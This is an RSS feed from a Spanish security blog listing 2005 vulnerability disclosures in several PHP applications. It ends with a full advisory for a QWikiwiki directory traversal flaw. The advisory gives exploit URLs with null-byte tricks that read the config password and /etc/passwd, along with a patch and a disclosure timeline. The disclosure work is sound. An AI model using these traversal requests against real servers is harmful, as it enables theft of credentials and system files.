Weblog de Madelman » Vulnerabilidades http://elligre.tk/madelman Weblog sobre seguridad Wed, 05 Nov 2008 16:10:33 +0000 http://wordpress.org/?v=2.8.5 es hourly 1 Vulnerabilidad en phpEventCalendar http://elligre.tk/madelman/index.php/archivos/2005/01/27/vulnerabilidad-en-phpeventcalendar/ http://elligre.tk/madelman/index.php/archivos/2005/01/27/vulnerabilidad-en-phpeventcalendar/#comments Thu, 27 Jan 2005 09:27:13 +0000 madelman http://www.elligre.tk/madelman/madelman/index.php/archivos/2005/01/27/vulnerabilidad-en-phpeventcalendar/ phpEventCalendar no comprueba el texto que se inserta en el calendario, lo que permite escribir código HTML y Javascript que será ejecutado por cualquier otro usuario que visualize el calendario.

Advisory: phpeventcalendar.txt (1 KB)

]]> http://elligre.tk/madelman/index.php/archivos/2005/01/27/vulnerabilidad-en-phpeventcalendar/feed/ 0 Vulnerabilidad en PHP Gift Registry http://elligre.tk/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-php-gift-registry/ http://elligre.tk/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-php-gift-registry/#comments Sun, 16 Jan 2005 16:56:29 +0000 madelman http://www.elligre.tk/madelman/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-php-gift-registry/ PHPGiftReq no valida los parámetros de entrada, lo que permite la inyección de código SQL y la consecuente modificacion de registros de la base de datos.

Advisory: phpgiftreg.txt (1 KB)

]]> http://elligre.tk/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-php-gift-registry/feed/ 0 Vulnerabilidad en Simple PHP Blog http://elligre.tk/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-simple-php-blog/ http://elligre.tk/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-simple-php-blog/#comments Sun, 16 Jan 2005 16:52:40 +0000 madelman http://www.elligre.tk/madelman/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-simple-php-blog/ Simple PHP Blog no comprueba el parametro entry, lo que permite leer ficheros aribitrarios con extensión TXT y la creación de carpetas en las cuales se guardará el contenido del post.

Advisory: sphpblog.txt (1 KB)

]]> http://elligre.tk/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-simple-php-blog/feed/ 0 Vulnerabilidad en Minis http://elligre.tk/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-minis/ http://elligre.tk/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-minis/#comments Sun, 16 Jan 2005 17:05:30 +0000 madelman http://www.elligre.tk/madelman/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-minis/ Minis no comprueba el parametro month lo que permite la lectura de cualquier fichero con extensión LOG.

Advisory: minis.txt (3 KB)

]]> http://elligre.tk/madelman/index.php/archivos/2005/01/16/vulnerabilidad-en-minis/feed/ 0 Vulnerabilidad en QWikiwiki http://elligre.tk/madelman/index.php/archivos/2005/01/07/vulnerabilidad-en-qwikiwiki/ http://elligre.tk/madelman/index.php/archivos/2005/01/07/vulnerabilidad-en-qwikiwiki/#comments Fri, 07 Jan 2005 09:30:26 +0000 madelman http://www.elligre.tk/madelman/madelman/index.php/archivos/2005/01/07/vulnerabilidad-en-qwikiwiki/ He estado investigando bastante sobre vulnerabilidades en PHP y revisando bastante código en busca de fallos de seguridad. Todas las vulnerabilidades que vaya descubriendo las ire publicando aqui, además de enviarlas a los autores del software y a las listas de seguridad (Bugtraq, SecurityFocus,…). Aqui va la primera de las vulnerabilidades.

Title: QWikiwiki directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 01/01/2005
Severity: Critical

Summary: 

QwikiWiki is driven by one core design goal: simplicity. This design goal is codified into three key principles: 

  • Self Sufficiency: QwikiWiki requires only a web server and PHP. 
  • Zero-Edit Deployment: QwikiWiki is immediately usable “out of the box”. 
  • Minimalist Featureset: QwikiWiki is not everything to everybody.

QwikiWiki uses only cookies and the file system, and thus does not require a MySQL server or any other database support. Data is stored in simple text files, and backups are just complete copies of the data directory. Ain’t nothing fancier than it need be.
(from vendor site: http://www.qwikiwiki.com)

QWikiwiki doesn’t check the page parameter which allows reading any file

This vulnerability has been tested with QWikiwiki 1.4.1

Details:

If we want to read the password for QWikiwiki:

REQUEST: http://[SERVER]/qwiki/index.php?page=../_config.php%00

RETURNS: (looking at source of HTML)

[...]
$QW_CONFIG['title'] = “QwikiWiki”;
$QW_CONFIG['adminName'] = “David Barrett”;
$QW_CONFIG['adminPassword'] = ‘changeme!’

We can also read any file the webserver has permission to:

REQUEST: http://[SERVER]/qwiki/index.php?page=../../../../../../etc/passwd%00

RESPONSE:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]

Solution:

Temporary Fix In file _wikiLib.php substitute

function QWCreateDataPath( $page, $extension ) {
return ‘data/’. $page . $extension;
}

with

function QWCreateDataPath( $page, $extension ) {
if (strpos($page, “..”) === false) {
return ‘data/’. $page . $extension;
} else {
return ”;
} }

Timeline: 

01/01/2005 – Vulnerability found
01/01/2005 – Vendor contacted
01/01/2005 – Vendor confirmed bug
04/01/2005 – Bug published in vendor page and advisory released

]]> http://elligre.tk/madelman/index.php/archivos/2005/01/07/vulnerabilidad-en-qwikiwiki/feed/ 1